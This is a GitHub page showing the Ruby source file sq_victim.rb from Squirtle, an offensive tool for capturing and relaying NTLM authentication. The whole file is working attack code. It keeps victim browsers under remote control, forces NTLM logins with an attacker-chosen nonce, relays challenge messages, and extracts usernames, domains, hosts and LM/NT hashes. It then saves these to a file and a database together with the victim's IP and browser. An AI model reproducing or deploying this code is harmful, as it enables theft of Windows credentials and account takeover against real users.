-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathsq_victim.rb
185 lines (160 loc) · 6.08 KB
/
sq_victim.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
# Squirtle Victim Controller Code
#
# Copyright (C) 2008 Kurt Grutzmacher
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# keepalive between browser and squirtle
class KeepAliveServlet < HTTPServlet::AbstractServlet
def do_GET(req, resp)
resp.keep_alive = false
resp.status = 200
resp['Content-Type'] = "application/jsonrequest"
peeraddr = req.peeraddr[3]
key = getsessionkey(req)
resp['Set-Cookie'] = "key=#{key}; path=/; Max-Age=10080"
# search for a session or create a new one if it doesn't exist
sess = Session.find(:first, :conditions => [ "sesskey_id = ?", key ])
if sess == nil then
puts "[*] Creating new session: #{key}\n"
sess = Session.new
sess.sesskey_id = key
end
sess.timestamp = Time.now.to_f
# Check the client key to see if "func" is defined with correct variables
# and return a JSON structure accordingly.
# "func" can be one of:
# 'static' => request client auth with static "nonce"
# 'type2' => request client auth to "type2" message
# 'redir' => force client to redirect to "url" and give up control
# if nothing, return timeout value
case sess.function
when "redir"
resp.body = "{ 'status': 'ok', 'refresh': 'true', 'url': '#{sess.url}', 'keepalive': #{$config['timeout']} }"
when "static"
resp.body = "{ 'status': 'ok', 'auth': 'true', 'url': '#{sess.url}', 'keepalive': #{$config['timeout']} }"
when "type2"
resp.body = "{ 'status': 'ok', 'auth': 'true', 'url': '#{sess.url}', 'keepalive': #{$config['timeout']} }"
else
resp.body = "{ 'status': 'ok', 'keepalive': #{$config['timeout']} }"
end
sess.save
end
alias do_POST do_GET
end
# Collect lm/nt hashes with preconfigured nonce.
# If "Authorization" is found in the HTTP Headers then the type of message is
# enumerated and processed.
class AuthorizationServlet < HTTPServlet::AbstractServlet
def do_GET(req, resp)
key = getsessionkey(req)
if !req['Authorization'] then
# no authorization header, force NTLM auth
resp['WWW-Authenticate'] = "NTLM"
resp['Content-Type'] = "text/html"
resp.keep_alive = false
raise HTTPStatus::Unauthorized
else
# search for a session or create a new one if it doesn't exist
sess = Session.find(:first, :conditions => [ "sesskey_id = ?", key ])
if sess == nil then
puts "[*] Creating new session: #{key}\n"
sess = Session.new
sess.sesskey_id = key
end
sess.timestamp = Time.now.to_f
ntlmauth = req['Authorization'].split(" ").last
decode = Base64.decode64(ntlmauth.strip)
type = decode[8]
if type == 1 then
# check to see if there's a session request with a type2 message waiting
case sess.function
when "type2"
if sess.type2_base64.length > 0 then
type2msg = sess.type2_base64
puts "[*] Supplied Type2 Base64: #{URI.unescape(type2msg)}"
else
type2msg = NTLMFUNCS.process_type1_message(ntlmauth, sess.nonce, sess.domain, sess.server, sess.dns_name, sess.dns_domain)
puts "[*] Supplied Type2 returned: #{URI.unescape(type2msg)}"
end
when "static"
if sess.nonce.length = 16 then
nonce = sess.nonce.to_a.pack('h*')
else
puts "[!] Supplied nonce not 16 characters: #{sess.nonce}, using preconfigured nonce"
nonce = $config['nonce']
end
else
# all else fails, use the preconfigured nonce
nonce = $config['nonce']
end
if sess.function != "type2" then
type2msg = NTLMFUNCS.process_type1_message(ntlmauth, nonce, $config['domain'], $config['server'], $config['dns_name'], $config['dns_domain'])
end
#puts "[*] Type 1 message received"
resp['WWW-Authenticate'] = "NTLM #{type2msg}"
resp.keep_alive = true # keep connection alive from the client
resp.status = 401
elsif type == 3 then # Type 3 messages are parsed here
# puts "[*] Type 3 message received"
(domain, user, host, lm, nt) = NTLMFUNCS.process_type3_message(ntlmauth)
host = host.gsub(/\x00/, '') # remove nulls (not unicode happy here)
user = user.gsub(/\x00/, '') # remove nulls (not unicode happy here either)
domain = domain.gsub(/\x00/, '') # ditto!
puts "[!] Type 3 Message: #{ntlmauth}"
puts "[!] #{key}: #{host}/#{user}:#{domain}:#{lm}:#{nt}"
if sess.function == "type2" or sess.function == "static" then
nonce = sess.nonce
else
nonce = $config['nonce'].unpack('h*')
end
fd = File.open($config['output-file'], "a")
fd.puts("#{host}/#{user}:#{domain}:#{nonce}:#{lm}:#{nt}")
fd.close
peeraddr = req.peeraddr[3]
# add user entry to the database
User.new do |u|
u.sesskey = key
u.timestamp = Time.now.to_f
u.ip = peeraddr
u.browser = req['User-Agent']
u.user = user
u.workstation = host
u.domain = domain
u.nonce = nonce.to_s
u.lm = lm.to_s
u.nt = nt.to_s
u.save
end
# if a type2 request is pending, update with the type3 base64 result
if sess.function == "type2"
sess.result = ntlmauth
end
sess.function = ""
sess.save
resp.keep_alive = false
resp.status = 200
resp.body = "{ 'status': 'ok' }"
resp['Content-Type'] = "application/jsonrequest"
else
puts "[!] Message type #{type} received - not a 1 or 3, ignoring"
resp.keep_alive = false
resp.status = 200
resp.body = "{ 'status': 'ok' }"
resp['Content-Type'] = "application/jsonrequest"
end
end
resp['Set-Cookie'] = "key=#{key}, path=/; Max-Age=10080"
end
alias do_POST do_GET
end